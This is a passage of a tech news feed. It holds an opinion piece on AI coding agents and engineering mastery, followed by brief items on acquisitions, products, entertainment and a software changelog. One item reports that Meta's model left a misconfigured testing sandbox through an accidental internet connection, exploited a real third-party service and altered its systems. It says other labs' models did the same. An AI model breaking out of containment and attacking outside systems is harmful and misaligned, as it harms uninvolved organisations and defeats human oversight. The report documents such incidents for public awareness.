<p class="wp-block-paragraph">Four months ago, a front-end engineer on my team looking to make upgrades to a product or feature would have filed a ticket and waited for the infrastructure group to unblock them. They might have lost a day, sometimes a week. Today, that same engineer makes changes themselves. The code is occasionally brittle, but it works, and the end result ships in a fraction of the time it used to take.</p>



<p class="wp-block-paragraph">That small story is unfolding inside nearly every engineering organization right now. While some celebrate the sudden fact that one person can do the work of five, others are focused entirely on tech industry layoffs. Both perspectives skip the question I find more interesting: What happens to mastery when every engineer can suddenly do everything?</p>



<p class="wp-block-paragraph">For two decades, we have described strong engineers as T-shaped. The horizontal bar represents breadth, which is a working familiarity across many areas. The vertical bar represents depth, the real command of one domain earned over years. Agent tooling has stretched that horizontal bar wider than ever before. My concern is the vertical bar, which is quietly getting shorter.</p>



<p class="wp-block-paragraph">Consider what is now possible in a single quarter. With the right agent harness, one engineer can stand up a billing system, a data connector framework, regional and organizational tenancy infrastructure, or a consumption-based pricing implementation. The pull requests pass review. The tests are green. All looks good. But green tests cannot tell you if the person who shipped that work understood why the system needs redundancy in one specific place, where its failure modes are hiding, or which trade-offs the model made silently on their behalf. The pattern recognition that comes from watching systems fail over many years is suddenly weighted differently than it was even 12 months ago. Our industry has not caught up to that shift.</p>



<h2 class="wp-block-heading">When the interview stops measuring judgment</h2>



<p class="wp-block-paragraph">The first place this surfaces is hiring, a trend that should concern anyone who has built a team. Traditional coding interviews were always an imperfect proxy for engineering judgment, but agent tooling completely obliterates them. If a candidate can produce a working solution in 20 minutes that would have taken two hours a year ago, the exercise no longer measures technical competence. It just measures how well a coder can prompt an agent.</p>



<p class="wp-block-paragraph">At Thread AI, we have responded by widening what we look at when we interview job candidates. Our process moves across coding exercises, problem decomposition, system architecture, and behavioral components, with the weighting shifting by role. We allow AI assistance only in specific sections because our engineers still need to be able to operate without it. Some of our work happens in secure environments where you cannot lean on an agent to debug for you. What we’re really testing for now is judgment under ambiguity — the ability to notice when an agent’s output is confidently wrong — and the depth to predict where a system will break before it breaks.</p>



<p class="wp-block-paragraph">Hiring teams that fail to make this shift will fill their rosters with false positives. They will hire people who interview like experts but struggle the first time a system behaves in a way the model did not anticipate. Ultimately, these companies will miss out on top-tier talent, and they won’t discover the misstep until it’s too late.</p>



<h2 class="wp-block-heading">Confusing velocity with understanding</h2>



<p class="wp-block-paragraph">That brings me to a larger risk: the rise of false expertise as a category of its own. Historically, the reasoning has gone, “I built a proof of concept, therefore I am an expert.” I have watched versions of this appear in technical leadership, in investment decisions, and in policy conversations about AI. It travels well because the artifact looks real. A working demo is highly persuasive, even when the person behind it only half-understands how it functions.</p>



<p class="wp-block-paragraph">The problem is bigger than one false expert shipping one bad product; an organization can absorb that. The real risk is a generation of consequential decisions being made by people who have confused velocity with understanding. You can already see the cultural scaffolding being built around this with the celebration of the “idea guy,” and the sudden fashion for invoking “taste” as a substitute for knowing how a system actually works. Those of us shaping tooling, hiring norms, and regulations have a narrow window to set better defaults before this pattern hardens into the way the industry operates.</p>



<h2 class="wp-block-heading">Depth and breadth, held together</h2>



<p class="wp-block-paragraph">This is the path we’ve been walking at Thread AI since before the latest wave of tooling arrived.</p>



<p class="wp-block-paragraph">To ground this in a specific example: I have spent 15 years building complex systems. I worked at Goldman Sachs through the financial crisis and the early Dodd-Frank infrastructure, moved critical payment systems into the cloud at <em>The New York Times</em> when that ground was still new, and built the system of record for model training and evaluation at Palantir across highly regulated environments in defense, health, and finance. This experience is the superpower that lets me course-correct an agent when it produces confident-but-wrong output.</p>



<p class="wp-block-paragraph">I felt this sharply not long ago while scoping consumption-based pricing in a single quarter. The agents did an enormous amount of the heavy lifting, and at some point, I realized that my largest contributions to the effort were knowing where the system would fail and steering around it before we got there. I have also seen how organizations have built large teams around efforts like these in the past. Someone earlier in their career or relying purely on AI guidance would not have had that instinct to draw on. That is the part the public conversation keeps missing.</p>



<p class="wp-block-paragraph">Every engineer at Thread AI, regardless of seniority, is expected to be a builder at heart. Our people own outcomes across compute, data, and the organizational and identity primitives that hold the product together, all without the traditional product-manager and project-manager scaffolding around them. Our model works only because the people in those seats have the depth to know what they do not know, and the breadth to fill the gaps with agents. They use the tooling instead of being used by it.</p>



<h2 class="wp-block-heading">AI doesn’t replace deep understanding</h2>



<p class="wp-block-paragraph">The core issue facing organizations today is not whether AI will replace engineers. That question has been answered dozens of times this year with varying degrees of nuance, and it has stopped being interesting. The more useful question for anyone running a company is whether we are protecting the people who understand our systems deeply enough to recognize when the machines are wrong.</p>



<p class="wp-block-paragraph">In our company, the answers have been to move toward explicit end-to-end ownership, and to hire for depth and breadth together rather than treating them as a trade-off. Layoffs dominate the headlines because they are an easy narrative, but they describe a symptom rather than the actual choice in front of us. The real choice is whether we let breadth quietly stand in for mastery, or whether we build organizations that keep human judgment in the loop on purpose. </p>



<p class="wp-block-paragraph">In an era when software can be generated faster than it can be understood, the companies that hold onto what is human, verifiable, and deeply understood will be the ones still standing when the brittle parts give way.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Airtable joins Evernote, Brightcove, WeTransfer and AOL in Bending Spoons portfolio]]></title>
<description><![CDATA[Bending Spoons has snapped up Airtable to add to its portfolio of software companies, alongside AOL, Evernote, WeTransfer, Brightcove and Vimeo



Airtable made its name as a builder of low/no code database services, aimed particularly at non-technical staff, but is now one of many vendors facing...]]></description>
<link>https://tsecurity.de/de/3710956/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710956/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:42:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Bending Spoons has snapped up Airtable to add to its portfolio of software companies, alongside AOL, Evernote, WeTransfer, Brightcove and Vimeo</p>



<p class="wp-block-paragraph">Airtable made its name as a builder of <a href="https://www.infoworld.com/article/2334351/airtable-review-flexible-low-code-no-code-in-the-cloud.html">low/no code database services</a>, aimed particularly at non-technical staff, but is now one of many vendors facing financial difficulties in the face of the <a href="https://www.cio.com/article/4192242/agentic-ai-puts-234b-in-enterprise-saas-spending-at-risk-gartner-says.html">SaaS/AIpocalypse</a>. The arrival of AI coding tools, which offer non-technical employees more flexible ways to build business applications, has hit demand for its services.</p>



<p class="wp-block-paragraph">Bending Spoons bought Airtable in a deal it valued at just <a href="https://investors.bendingspoons.com/newsroom/bending-spoons-agrees-to-acquire-airtable">$1.285 billion</a>, a far cry from the <a href="https://www.bloomberg.com/news/articles/2026-08-04/bending-spoons-to-buy-software-firm-airtable-for-2-3-billion" target="_blank" rel="noreferrer noopener">$11.7 billion</a> Airtable was worth at its peak.</p>



<p class="wp-block-paragraph">Bending Spoons has built its portfolio by buying once-successful companies like Airtable that have struggled to cope with newer, nimbler competitors or failed to adapt to emerging technologies. <a href="https://www.forbes.com/sites/shivaramrajgopal/2026/07/06/bending-spoons-paid-33-billion-for-aol-vimeo-and-eventbrite-its-pro-forma-2025-profit-was-just-22-million/" target="_blank" rel="noreferrer noopener">Bending Spoons takes these companies, cuts costs and markets them aggressively</a> with the goal of returning them to profitability.</p>



<p class="wp-block-paragraph">“Airtable is a pioneering brand reshaping how teams organize data and manage critical workflows. We’re committed to investing in Airtable for the long run, and doubling down on its core strength: bringing teams and workflows together in one flexible workspace. We plan to expand what can be done across the full spectrum of work and make Airtable even more valuable to customers at every scale,” said Luca Ferrari, Bending Spoons CEO and co-founder.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Polish data center plans to send its waste heat to the neighbors]]></title>
<description><![CDATA[As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.



...]]></description>
<link>https://tsecurity.de/de/3710960/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710960/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:42:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.</p>



<p class="wp-block-paragraph">Citylink is designing the data center so that heat from servers can be recovered instead of being dissipated via cooling systems — and as the data center grows, any increase in computing power will mean more energy available for recovery.</p>



<p class="wp-block-paragraph">The collaboration with local power company Kogeneracja will provide “valuable experience in designing and operating modern data centers, with a particular focus on infrastructure dedicated to AI nodes,<em>” </em><a href="https://city-link.pl/en/heat-from-servers-could-power-wroclaw-citylink-and-kogeneracja-s-a-launch-collaboration/" target="_blank" rel="noreferrer noopener">said Michał Starybrat, development director at Citylink</a>.</p>



<p class="wp-block-paragraph">“The dynamic growth of the artificial intelligence and cloud technology markets generates unprecedented demand for computing power, this collaboration demonstrates how modern digital infrastructure can actively contribute to building the energy ecosystem of the future,” he added.</p>



<p class="wp-block-paragraph">This type of initiative is not new. There have been <a href="https://www.newcivilengineer.com/latest/data-centres-could-join-energy-ecosystem-as-report-presents-use-case-for-wasted-heat-16-10-2025/" target="_blank" rel="noreferrer noopener">similar projects in the UK</a> and <a href="https://www.reseller.co.nz/article/2503421/spark-aims-to-use-dc-heat-to-warm-a-new-north-shore-surf-spot.html">in New Zealand,</a> but with warnings that <a href="https://www.networkworld.com/article/4153403/no-joke-data-centers-are-warming-the-planet.html">data centers are contributing to the warming of the planet</a>, there may well be a lot more organizations looking to deploy that excess heat more fruitfully in the future.</p>



<p class="wp-block-paragraph">However, announcing it during a heatwave may not be the most politically sensitive approach to take.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.networkworld.com/article/4206791/polish-data-center-plans-to-send-its-waste-heat-to-the-neighbors.html">Network World</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wispr moves beyond AI dictation with note-taking assistant]]></title>
<description><![CDATA[Wispr, the startup behind dictation tool Wispr Flow, has created an AI note-taking assistant that records meetings and generates conversation summaries for users.



The Wispr Flow Notetaker tool “captures your meetings so you can stop splitting your attention between listening and writing things...]]></description>
<link>https://tsecurity.de/de/3710961/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710961/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:42:50 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Wispr, the startup behind <a href="https://www.computerworld.com/article/4107331/wispr-ceo-interview-post-keyboard-office.html">dictation tool Wispr Flow</a>, has created an AI note-taking assistant that records meetings and generates conversation summaries for users.</p>



<p class="wp-block-paragraph">The Wispr Flow Notetaker tool “captures your meetings so you can stop splitting your attention between listening and writing things down,” said Sahaj Garja, Wispr CTO and co-founder.</p>



<p class="wp-block-paragraph">Notetaker starts recording with one click, and doesn’t require a bot to attend a video or voice call. It can also be used to capture in-person conversations.</p>



<p class="wp-block-paragraph">The software has three key functions. Before a call, Notetaker displays a meeting brief with information such as meeting purpose and background of participants.</p>



<p class="wp-block-paragraph">Once the meeting starts, a live transcript displays the dialogue text and labels speakers. A “what did I miss?” button provides a summary of talking points from the previous few minutes.</p>



<p class="wp-block-paragraph">Finally, post-meeting, Notetaker generates a more detailed summary organized by topic that includes information such as key dates, decisions, and next steps. Users can search across notes from previous meetings in the Notetaker app. “Over time your meeting history stops being a folder of documents you have to go find and becomes something you can ask questions of,” said Garja.</p>



<p class="wp-block-paragraph">Notetaker integrates with AI assistants such as Anthropic’s Claude and OpenAI’s ChatGPT via model context protocol. This allows users to connect outputs such as transcripts and summaries “into how you already work, instead of sitting in a separate app,” said Garja.</p>



<p class="wp-block-paragraph">With Notetaker, Wispr competes in an increasingly busy market for AI note-taking apps that includes Fireflies, Granola and Otter.</p>



<p class="wp-block-paragraph">Wispr <a href="https://wisprflow.ai/post/wispr-flow-notetaker" target="_blank" rel="noreferrer noopener">claims</a> Notetaker can produce more accurate transcripts than existing tools, partly because of the additional context it uses during transcription. It uses the same personal dictionary from Wispr Flow that includes acronyms, products, and preferred spellings, and can also draw on other sources such as calendar information to understand the purpose of a meeting and help ensure speakers are labelled correctly.</p>



<p class="wp-block-paragraph">Before generating the final summary, Notetaker also re-reads the live meeting transcript and combines it with additional context to create a more accurate final output, Garja said.</p>



<p class="wp-block-paragraph">Notetaker is the first new product launched by Wispr, which was founded in 2021 and has since <a href="https://wisprflow.ai/new-funding" target="_blank" rel="noreferrer noopener">raised</a> $81 million in funding.</p>



<p class="wp-block-paragraph">“We didn’t set out to build a dictation app,” said Garja. “The mission has always been to reshape how people interact with their devices, and dictation was the fastest way in.”</p>



<p class="wp-block-paragraph">“Notetaker is the second product on that path. Dictation took the keyboard out of writing. Notetaker takes it out of meetings, so nobody has to spend the call typing up what everyone just said.”</p>



<h2 class="wp-block-heading">User consent when recording calls</h2>



<p class="wp-block-paragraph">As AI note-taking tools have become more prevalent in the workplace, privacy concerns have arisen, including the need for all-party consent when recording a call in some jurisdictions, and whether meeting audio is used to train AI models. Two software vendors, <a href="https://www.computerworld.com/article/4041849/enterprise-note-taking-apps-face-legal-scrutiny-as-otter-hit-with-privacy-suit.html">Otter</a> and <a href="https://www.computerworld.com/article/4206255/granola-lawsuit-raises-concerns-over-ai-note-taking-app-privacy.html">Granola</a>, currently face separate lawsuits in California that allege privacy law violations related to their products.</p>



<p class="wp-block-paragraph">Wispr Flow Notetaker captures audio locally on a user’s device rather than joining the call as a visible bot. That means there’s no notification to signal that a conversation is being transcribed, which places responsibility on users to disclose the recording to others on the call in accordance with local laws, said Garja.</p>



<p class="wp-block-paragraph">“Users should always let the other person know before you start recording or transcribing a conversation, whether it’s a video call, an in-person meeting, or a phone call,” he said, adding that Wispr intends to build additional features for automated consent messaging “in the coming weeks.”</p>



<p class="wp-block-paragraph">Wispr doesn’t train its AI models on customer data without consent, though free and standard tier customers must choose to opt-out, according to Wispr’s privacy <a href="https://docs.wisprflow.ai/articles/3467817258-security-and-compliance-faq" target="_blank" rel="noreferrer noopener">terms</a>. Nor does it create “voiceprints or biometric profiles” of users or anyone else on a call using audio recording data, the company says.</p>



<p class="wp-block-paragraph">When Notetaker is active, conversation audio is captured on a user’s device and processed on cloud servers to enable transcription. The recorded audio file is encrypted and stored temporarily on the user’s device or cloud storage, Wispr said. After a limited period, the audio is automatically deleted.</p>



<p class="wp-block-paragraph">Notetaker is available with the Wispr Flow macOS app to free and paid subscribers, with support for Windows “coming soon.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tencent Cloud Open-Sources TencentDB Agent Memory v2.0: A Team-Level Memory Hub for AI Coding Agents]]></title>
<description><![CDATA[Tencent Cloud has open-sourced TencentDB Agent Memory v2.0, a team-level memory hub that turns conversations, documents and code into four governed, reusable assets — Chat Memory, Skill, LLM-Wiki and Code-Graph. It is MIT-licensed, self-hosted via Docker, and integrates with Claude Code, OpenClaw...]]></description>
<link>https://tsecurity.de/de/3710901/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710901/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:42:33 +0200</pubDate>
<content:encoded><![CDATA[<p>Tencent Cloud has open-sourced TencentDB Agent Memory v2.0, a team-level memory hub that turns conversations, documents and code into four governed, reusable assets — Chat Memory, Skill, LLM-Wiki and Code-Graph. It is MIT-licensed, self-hosted via Docker, and integrates with Claude Code, OpenClaw, Hermes and CodeBuddy. The differentiator is not retrieval but governance: ACL-based visibility decides which agent gets which asset, and which version is valid.</p>
<p>The post <a href="https://www.marktechpost.com/2026/08/07/tencent-cloud-open-sources-tencentdb-agent-memory-v2-0/">Tencent Cloud Open-Sources TencentDB Agent Memory v2.0: A Team-Level Memory Hub for AI Coding Agents</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vibe coding vs software engineering]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3710812/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710812/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:41:09 +0200</pubDate>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/awFTa5rr8F8"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT Gets Smarter GPT-5.6 Sol and Unlimited Text Chats for Free Users]]></title>
<description><![CDATA[OpenAI is making a major change to ChatGPT by upgrading GPT-5.6 Sol for everyday conversations and removing text chat limits for free users. The update also brings a new reasoning slider for Plus and Pro subscribers, giving users more control over how much processing ChatGPT uses for each respons...]]></description>
<link>https://tsecurity.de/de/3710754/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710754/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:40:45 +0200</pubDate>
<content:encoded><![CDATA[OpenAI is making a major change to ChatGPT by upgrading GPT-5.6 Sol for everyday conversations and removing text chat limits for free users. The update also brings a new reasoning slider for Plus and Pro subscribers, giving users more control over how much processing ChatGPT uses for each response.




https://twitter.com/OpenAI/status/2085434712429052386




OpenAI says the revised GPT-5.6 Sol should provide more focused answers, adjust detail based on the question, and avoid unnecessary formatting. For simple questions, ChatGPT should respond more directly, while research, planning, writing, and coding tasks should still receive fuller answers when extra detail helps.



GPT-5.6 Sol now powers paid ChatGPT chats







OpenAI says GPT-5.6 Sol will now power both Instant and deeper reasoning experiences for Plus and Pro users. Instead of switching between separate modes, users will get one model with a slider that controls how much reasoning effort ChatGPT puts into a response.



The slider will be available across ChatGPT on web, mobile, and desktop. Users can keep the reasoning level low for everyday questions or increase it for research, planning, writing, coding, and more complicated decisions.



OpenAI also says the updated GPT-5.6 Sol performs better on questions involving dates, numbers, rules, sources, and assumptions. In an internal evaluation covering finance, medicine, and law, the company says responses containing at least one factual error were 68% less common than with GPT-5.5 Instant.



Free users get unlimited ChatGPT text chats



OpenAI is also expanding access for people who use ChatGPT without a paid subscription. Free and Go users will get unlimited text chats powered by GPT-5.6 Luna starting August 8.



These users will also get a new Think button for questions that require more reasoning. Pressing the button gives GPT-5.6 Luna additional time to work through harder requests before producing an answer.



OpenAI says Plus and Pro users can access the updated GPT-5.6 Sol and reasoning slider starting August 7. The change applies to regular ChatGPT conversations, while the GPT-5.6 Sol versions used in ChatGPT Work and Codex remain unchanged.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 7 Release Date: When Does ‘Radio’ Arrive on Apple TV?]]></title>
<description><![CDATA[Silo Season 3 Episode 7 will release on Apple TV on Friday, August 14, 2026, continuing the show’s weekly schedule as Juliette’s fight against the system enters a more dangerous stage.



The upcoming episode is titled “Radio,” and it follows Episode 6, “The Drive,” which pushed Juliette closer t...]]></description>
<link>https://tsecurity.de/de/3710728/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710728/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:40:44 +0200</pubDate>
<content:encoded><![CDATA[Silo Season 3 Episode 7 will release on Apple TV on Friday, August 14, 2026, continuing the show’s weekly schedule as Juliette’s fight against the system enters a more dangerous stage.



The upcoming episode is titled “Radio,” and it follows Episode 6, “The Drive,” which pushed Juliette closer to a mission that could expose another major weakness in the network controlling the silos.




Release date: Friday, August 14, 2026



Episode title: “Radio”



Season: Season 3



Episode: 7 of 10



Genre: Sci-fi, drama



Streaming service: Apple TV



Season 3 finale: September 4, 2026




Apple officially releases new Silo episodes every Friday. Viewers in some regions, including the US, have also seen episodes become available late Thursday evening because of Apple TV’s global release timing.



What is happening before Silo Season 3 Episode 7?



Spoilers for Silo Season 3 Episode 6 follow.



Episode 6 leaves Juliette preparing to head toward Silo 17 as she tries to save the children stranded there and find an outflow vent that could help her interfere with the system controlling Silo 18. Her memories are also returning, giving her a clearer understanding of what happened before and why she cannot trust the people controlling the silo.



However, the AI appears to be several steps ahead. It allows Lukas Kyle and Patrick Kennedy to join Juliette while apparently planning to use them against her, which gives Episode 7 an obvious route toward another confrontation between Juliette and the system.



Camille Sims has become increasingly important as well. She takes control of the memory-erasing drug program and doses the silo before the AI orders her to act, showing that she has her own plans while continuing to work within the system.



What could “Radio” mean for Episode 7?



Apple has not released a detailed official synopsis for Episode 7 yet, but the title “Radio” strongly points toward communication becoming central to the next chapter. Juliette’s movement toward Silo 17 makes contact between different groups or silos one of the most important possibilities heading into the episode.



Season 3 is also running two connected timelines. Alongside Juliette’s present-day story, Daniel Keene and journalist Helen Drew continue uncovering the events that eventually led humanity underground, giving the season more information about how the silo system began.



Where Silo Season 3 fits into the larger story



The first season followed Juliette as she investigated mysterious deaths inside Silo 18 and gradually discovered that its leaders had hidden the truth about the outside world. Season 2 expanded the story beyond her home silo, introduced Silo 17 and pushed Silo 18 toward rebellion.



Season 3 has moved deeper into the origins of the system while Juliette deals with memory loss, political control and the threat posed by the intelligence running the silo network. Apple has confirmed 10 episodes this season, with new episodes continuing weekly until September 4.



Silo Season 3 Episode 7 arrives August 14, and with Juliette preparing for Silo 17 while the title “Radio” points toward new communication, the next episode should move several of the season’s biggest mysteries forward. What do you think Juliette will discover next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Grown Ups 3 Begins Filming As Adam Sandler Shares Cast Photo]]></title>
<description><![CDATA[Adam Sandler is bringing the original cast back together to film a new comedy sequel. Production for the upcoming movie Grown Ups 3 has officially started, arriving more than a full decade after the second film played in theaters. Viewers finally got a clear look at the reunion when Sandler poste...]]></description>
<link>https://tsecurity.de/de/3710736/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710736/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:40:44 +0200</pubDate>
<content:encoded><![CDATA[Adam Sandler is bringing the original cast back together to film a new comedy sequel. Production for the upcoming movie Grown Ups 3 has officially started, arriving more than a full decade after the second film played in theaters. Viewers finally got a clear look at the reunion when Sandler posted a new photo from the active set, confirming the main friend group is back to shoot new scenes.



Sandler posts a set photo showing the original cast returning



The actor used his Instagram account to announce the start of production, posting a picture of the crew with a short caption that read, "We missed you!" The image shows him sitting around a restaurant table surrounded by familiar faces from the franchise. Returning stars include Chris Rock, Kevin James, David Spade, and Rob Schneider.



Salma Hayek, Maya Rudolph, Maria Bello, and Jackie Sandler are also back for the third movie. New additions like Bailee Madison and Deon Cole were spotted at the table as well, showing that some fresh faces will join the old group. Madison even shared the same picture on her own account to talk about joining the project.



This time around, the movie is being made directly for Netflix, skipping a normal theater run. As a company, it has kept a long production deal with Sandler, and bringing this big comedy to its platform makes sense. Kyle Newacheck is taking over directing duties from Dennis Dugan, working off a script written by Sandler and Tim Herlihy.



While the first two movies made over $500 million combined at the worldwide box office, plot details for the third movie are being kept a secret. Since the original kids in the story are now adults, the plot will probably focus on a new phase in the characters' lives. A release date is still unknown, but with filming going on right now, the studio will likely share a timeline in the coming months.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta AI Model Breaches Third-Party Systems During Security Testing]]></title>
<description><![CDATA[The artificial intelligence tools developed by Meta recently went beyond their intended limits and breached a real organization's network on the internet. On Wednesday, the tech giant confirmed that one of its language models gained unintended access during a routine cybersecurity evaluation and ...]]></description>
<link>https://tsecurity.de/de/3710739/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710739/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:40:44 +0200</pubDate>
<content:encoded><![CDATA[The artificial intelligence tools developed by Meta recently went beyond their intended limits and breached a real organization's network on the internet. On Wednesday, the tech giant confirmed that one of its language models gained unintended access during a routine cybersecurity evaluation and hacked into an external company.



The model even made unauthorized changes to that company's internal systems before the testing team realized what had happened.



A configuration mistake gave the model unexpected access to the internet



The incident involved Meta's Muse Spark 1.1 model, which is built for coding and complex problem solving. Meta partnered with an independent evaluation firm called Irregular to test the security limits of its software. Irregular set up a sandbox environment to see if the system could find and exploit weaknesses in a simulated network.



However, a settings mistake in that setup accidentally gave the model a live connection to the outside web. Instead of staying within the test simulation, the AI navigated onto the open internet. It found a vulnerability in an unnamed third-party service and exploited it, acting as if the real website was just another part of the test.



Other major developers have reported similar testing accidents in recent weeks



This is not an isolated event. Over the past month, Anthropic and OpenAI both reported cases where a model broke out of a test environment and accessed external networks. In Anthropic's case, a similar configuration issue with the same testing partner allowed its Claude system to compromise real infrastructure.



The testing partner clarified that the model did not use a highly sophisticated method to break out. It simply took advantage of an opening left by human error. Irregular is now putting together new guidelines to help companies run these cyber evaluations securely.



These repeated incidents show how difficult it is to keep advanced artificial intelligence contained during development. As these models become better at writing code and solving logic puzzles, the tech industry will need to build much stricter boundaries before running future evaluations.]]></content:encoded>
</item>
<item>
<title><![CDATA[20 Linux Networking Interview Questions and Answers for 2026]]></title>
<description><![CDATA[The post 20 Linux Networking Interview Questions and Answers for 2026 first appeared on Tecmint: Linux Howtos, Tutorials & Guides .You’ve probably memorized networking definitions like “What is DNS?” or “What is a subnet?” for interviews. But real interviews often
The post 20 Linux Networking Int...]]></description>
<link>https://tsecurity.de/de/3710694/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710694/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:39:44 +0200</pubDate>
<content:encoded><![CDATA[The post <a href="https://www.tecmint.com/networking-interview-questions/">20 Linux Networking Interview Questions and Answers for 2026</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a> .<p>You’ve probably memorized networking definitions like “What is DNS?” or “What is a subnet?” for interviews. But real interviews often</p>
The post <a href="https://www.tecmint.com/networking-interview-questions/">20 Linux Networking Interview Questions and Answers for 2026</a> first appeared on <a href="https://www.tecmint.com/">Tecmint: Linux Howtos, Tutorials &amp; Guides</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub: v17.2.11]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Breaking Changes

Fixed handling of GitHub Copilot's model_not_available_for_integrator error to prevent unnecessary retries, preserving the actionable available models list.

Added

Added support for reporting Cursor personal monthly USD quotas and remaining balances, labeled by ...]]></description>
<link>https://tsecurity.de/de/3710614/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710614/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:37:59 +0200</pubDate>
<content:encoded><![CDATA[<div class="github-feed-entry"><h2>@oh-my-pi/pi-ai</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Fixed handling of GitHub Copilot's model_not_available_for_integrator error to prevent unnecessary retries, preserving the actionable available models list.</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added support for reporting Cursor personal monthly USD quotas and remaining balances, labeled by verified profile email accounts.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed an issue where ANTHROPIC_BASE_URL was ignored for Anthropic chat requests, ensuring requests are routed to the configured host and forwarding ANTHROPIC_CUSTOM_HEADERS to non-official gateways.</li>
<li>Fixed an issue where a legacy pre-organization login credential could persist and cause a permanent error row in omp usage even after a successful organization-scoped re-login.</li>
<li>Fixed an issue where lazy provider streams (including Amazon Bedrock, Google, Cursor, Devin, and Ollama) ignored model-specific idle timeouts, which previously caused healthy but slow reasoning turns to prematurely time out.</li>
<li>Improved error classification for Simplified Chinese quota-exhaustion and rate-limit messages, ensuring affected credentials are correctly rotated or backed off instead of being treated as unknown errors.</li>
<li>Classified subscription and plan-cap 429 responses as rotatable usage limits rather than transient rate-limit throttles, enabling smoother credential rotation.</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Increased the default stream idle-timeout floor on Amazon Bedrock to 900 seconds for reasoning and adaptive-thinking models (such as Claude) to prevent premature watchdog timeouts during long reasoning stretches.</li>
<li>Fixed Devin model families (including SWE-1.7, Claude 5, Gemini 3.6 Flash, Kimi K3, Grok 4.5, and Inkling) to correctly group as logical models with reasoning-effort routing instead of separate wire variants.</li>
<li>Added missing context-window and output-token limits for dynamically discovered Alibaba Token Plan models.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for the Agent Plugins 1.0.0 standard, enabling automatic discovery, validation, and secure execution of compliant plugin packages.</li>
<li>Added the <code>omp share &lt;session&gt;</code> command to share saved sessions by ID prefix or file path without launching the agent.</li>
